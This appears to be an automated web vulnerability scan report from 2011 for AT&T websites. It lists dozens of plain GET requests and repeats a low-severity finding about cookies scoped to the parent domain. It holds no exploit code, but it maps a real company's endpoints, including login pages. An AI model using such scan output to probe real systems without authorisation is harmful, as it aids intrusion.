The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /esupport/additionalServices.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /esupport/article.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /esupport/billAndAccount.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /esupport/billingAndAccount.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /esupport/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /esupport/main.jsp?wtSlotClick=1-006E1O-0-3&cv=821 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /esupport/travelAndIntl.jsp?wtSlotClick=1-006E1O-0-2&cv=820 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /esupport/welcome.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
DTAB=Tab=Bus; Expires=Mon, 05 Dec 2011 11:07:28 GMT; Path=/; Domain=.att.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gen/landing-pages?pid=9213 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://www.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV" Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 06 Sep 2011 11:07:29 GMT Content-Length: 28750 Connection: close Set-Cookie: DTAB=Tab=Bus; Expires=Mon, 05 Dec 2011 11:07:28 GMT; Path=/; Domain=.att.com
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <he ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /global/cms/u-verse/en_US/popups/channel-lineup.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /globalnav/includes/segmentation_menu.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /globalnav/includes/user_info.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /homepage/index.jsp?locale=es_US HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /homepage/virtual/zipentry.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /learningcenter/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html lang="en"> <head> <title>4G Speed from AT&T - AT&T 4G with HSPA+ and LTE ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/apps/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html lang=""> <head> <title>AT&T App Center - Cell Phone Apps & iPhone ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/bundles/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en_US"> <head> <meta NAME="DCS ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/bundles/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en_US"> <head> <meta NAME="DCS ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/help HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://www.att.com/shop/help/">htt ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/home-phone/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/home-phone/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/internet/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/internet/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/popups/en_US/marquee_online_offer_details_legal.html|600|300 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/special-offers/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/special-offers/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/tv/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/tv/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/u-verse/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/u-verse/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/wireless/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/wireless/devices/lg-thrill-4g.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/wireless/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/wireless/plans/messaging-plans.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html lang="en"> <head> <title>AT&T Messaging Unlimited Plan - Mobile to An ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AT&T Site Map ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /storelocator/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Pragma: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref=""/w3c/p3p.xml"", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA GOV" X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Sep 2011 11:07:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: TLTHID=6AB640D4D87810D8CCA58681F93E16CD; Path=/; Domain=.att.com Set-Cookie: ECOM_GTM=owbth_NA_NA_NA_ostdbth; domain=.att.com; expires=Wednesday, 05-Sep-2012 11:07:31 GMT; path=/ Content-Length: 62600
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/911.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/advanced-features.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/battery-backup.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/default.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/home-alarm.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/international-rates.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/internet-landing.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/phone-landing.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/safety-security.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/storage-convenience.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/explore/uverse-difference.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/shop/channel-lineup.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/shop/customize.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /u-verse/shop/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.att.com">here</a>.</p> </body></html ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
colam_ctn=l%3Den_US; Domain=att.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /eos/unauth/eosLogin HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /olam/enterEmailForgotId.myworld HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /olam/loginAction.doview HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/accessories/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/cell-phone-plans/data-connect-plans.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/cell-phone-plans/family-cell-phone-plans.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/cell-phone-plans/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/cell-phone-plans/individual-cell-phone-plans.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/cell-phone-plans/pyg-cell-phone-plans.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/cell-phones/ HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/cell-phones/cell-phones.jsp?wtSlotClick=1-005Y6F-0-1&feacondition=allphones&feaavailable=allphones&feafree=free&feapaytype=standard&startFilter=false&allTypes=on&allManus=on HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/cell-phones/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/cell-phones/pda-phones-smartphones.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/go-phones/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/packages/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/ringtones_media/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/services/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/specials/netbooks.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cell-phone-service/transfer-your-number/ HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /coverageviewer/ HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.att.com/stor ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /learn/international/ HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
